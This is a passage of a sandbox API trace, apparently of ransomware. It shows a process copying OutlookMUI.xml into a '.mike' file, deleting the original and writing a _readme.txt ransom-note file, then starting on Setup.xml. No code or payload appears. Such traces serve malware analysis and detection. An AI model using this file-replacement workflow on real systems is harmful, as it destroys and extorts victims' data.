Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0040.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0040.001] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.002] GetFileType (hFile=0x264) returned 0x1 [0040.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0040.002] GetFileType (hFile=0x264) returned 0x1 [0040.002] CloseHandle (hObject=0x264) returned 1 [0040.002] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0040.002] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0040.002] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0040.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0040.002] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0040.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.002] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2208fa0 | out: lpFileInformation=0x2208fa0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xc72)) returned 1 [0040.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.002] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0040.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.003] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x22092d8 | out: lpFileInformation=0x22092d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xc72)) returned 1 [0040.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.003] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0040.003] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.mike", lpFilePart=0x0) returned 0x52 [0040.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.003] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.003] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0040.003] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0040.003] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0040.003] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.mike", lpFilePart=0x0) returned 0x52 [0040.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0040.003] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0040.003] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.mike", lpFilePart=0x0) returned 0x52 [0040.004] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.004] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.004] GetFileType (hFile=0x264) returned 0x1 [0040.004] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.004] GetFileType (hFile=0x264) returned 0x1 [0040.004] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0040.004] WriteFile (in: hFile=0x264, lpBuffer=0x220a214*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x220a214*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0040.005] CloseHandle (hObject=0x264) returned 1 [0040.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0040.005] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2209ce8 | out: lpFileInformation=0x2209ce8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xc72)) returned 1 [0040.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0040.005] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0040.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0040.005] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.005] GetFileType (hFile=0x264) returned 0x1 [0040.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0040.006] GetFileType (hFile=0x264) returned 0x1 [0040.006] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0040.006] ReadFile (in: hFile=0x264, lpBuffer=0x220b350, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x220b350*, lpNumberOfBytesRead=0x2af110*=0xc72, lpOverlapped=0x0) returned 1 [0040.007] CloseHandle (hObject=0x264) returned 1 [0040.008] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.mike", lpFilePart=0x0) returned 0x52 [0040.008] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.008] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.008] GetFileType (hFile=0x264) returned 0x1 [0040.008] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.008] GetFileType (hFile=0x264) returned 0x1 [0040.008] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0040.008] WriteFile (in: hFile=0x264, lpBuffer=0x2212cf4*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x2212cf4*, lpNumberOfBytesWritten=0x2af104*=0xc80, lpOverlapped=0x0) returned 1 [0040.008] CloseHandle (hObject=0x264) returned 1 [0040.009] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.mike", lpFilePart=0x0) returned 0x52 [0040.009] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0040.009] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.009] GetFileType (hFile=0x264) returned 0x1 [0040.009] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0040.009] GetFileType (hFile=0x264) returned 0x1 [0040.010] WriteFile (in: hFile=0x264, lpBuffer=0x2215f30*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x2215f30*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0040.010] CloseHandle (hObject=0x264) returned 1 [0040.011] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0040.011] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.mike", lpFilePart=0x0) returned 0x52 [0040.011] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.011] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe20ce580, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe20ce580, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe20ce580, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xea0)) returned 1 [0040.011] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.011] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0040.011] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.mike", lpFilePart=0x0) returned 0x52 [0040.011] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.011] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x22176f0 | out: lpFileInformation=0x22176f0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe20ce580, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe20ce580, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe20ce580, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xea0)) returned 1 [0040.012] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.012] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0040.012] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", dwFileAttributes=0x80) returned 1 [0040.012] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0040.012] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml")) returned 1 [0040.013] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0040.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.013] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.013] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0040.013] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0040.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0040.013] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0040.013] GetFileType (hFile=0x264) returned 0x1 [0040.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0040.013] GetFileType (hFile=0x264) returned 0x1 [0040.014] WriteFile (in: hFile=0x264, lpBuffer=0x2219410*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x2219410*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0040.015] CloseHandle (hObject=0x264) returned 1 [0040.015] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.015] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.015] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.015] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0040.015] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.016] GetFileType (hFile=0x264) returned 0x1 [0040.016] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0040.016] GetFileType (hFile=0x264) returned 0x1 [0040.016] CloseHandle (hObject=0x264) returned 1 [0040.016] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.016] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.016] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0040.016] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0040.016] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0040.016] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.016] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.017] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x221b3e4 | out: lpFileInformation=0x221b3e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f)) returned 1 [0040.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.017] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.017] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x221b700 | out: lpFileInformation=0x221b700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, 